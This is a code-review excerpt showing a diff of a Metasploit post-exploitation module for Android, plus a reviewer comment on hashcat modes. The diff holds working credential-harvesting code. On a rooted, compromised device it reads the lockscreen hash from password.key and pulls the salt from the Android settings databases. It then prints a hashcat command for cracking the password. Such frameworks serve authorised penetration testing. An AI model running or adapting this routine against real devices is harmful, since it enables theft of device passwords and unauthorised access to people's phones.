modules/post/android/gather/hashdump.rb

```diff
@@ -0,0 +1,169 @@
+
+        # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
+        # we have to do this since the ext is > 3
+        # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
+        new_name = "#{db_loot_name}#{ext}"
+        FileUtils.mv(loot_file, new_name)
+      end
+      SQLite3::Database.new(db_loot_name)
+    end
+
+    unless is_root?
+      fail_with Failure::NoAccess, 'This module requires root permissions.'
+    end
+
+    print_status('Attempting to determine unsalted hash.')
+    key_file = '/data/system/password.key'
+    unless file_exist?(key_file)
+      print_error('No password.key file, no password on device.')
+      return
+    end
+
+    hash = read_file(key_file)
+    if hash.empty?
+      print_error("Unable to read #{key_file}, and retrieve hash.")
+      return
+    end
+    store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')
+    print_good('Saved password.key')
+
+    print_status('Attempting to determine salt')
+    os = cmd_exec("getprop ro.build.version.release")
+    vprint_status("OS Version: #{os}")
+    if Gem::Version.new(os) < Gem::Version.new('4.3.0')
+      # this is untested.
+      begin
+        vprint_status('Attempting to load < 4.3.0 Android settings file')
+        db = read_store_sql('settings.db', '/data/data/com.android.providers.settings/databases/settings.db')
+        if db.nil?
+          print_error('Unable to load settings.db file.')
+          return
+        end
+        salt = db.execute('SELECT lockscreen.password_salt from secure;')
+      rescue SQLite3::SQLException
+        print_error("Failed to pull salt from database.  Command output: #{salt}")
+        return
+      end
+    else
+      begin
+        vprint_status('Attempting to load >= 4.3.0 Android settings file')
+        db = read_store_sql('locksettings.db', '/data/system/locksettings.db')
+        if db.nil?
+          print_error('Unable to load locksettings.db file.')
+          return
+        end
+        salt = db.execute("select value from locksettings where name='lockscreen.password_salt'")
+      rescue SQLite3::SQLException
+        print_error('Unable to retrieve salt value from database.')
+        return
+      end
+    end
+
+    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative, therefore 20 char
+    unless salt.to_s.length.between?(19,20)
+      print_error("Unable to pull salt from database.  Command output: #{salt}")
+      return
+    end
+
+    # convert from number string to hex and lowercase
+    salt = salt.to_i.to_s(16)
+    if salt.start_with?('-')
+      salt[0] = '' # fastest way to remove first character
+    end
+    print_good("Password Salt: #{salt}")
+
+    sha1 = hash[0...40]
+    sha1 = "#{sha1}:#{salt}"
+    print_good("SHA1: #{sha1}")
+    print_good("Crack with: hashcat -m 5800 #{sha1}")
```

Comment:
From my very limited testing it's 5800 on Samsung devices, and `-m 110` on everything else?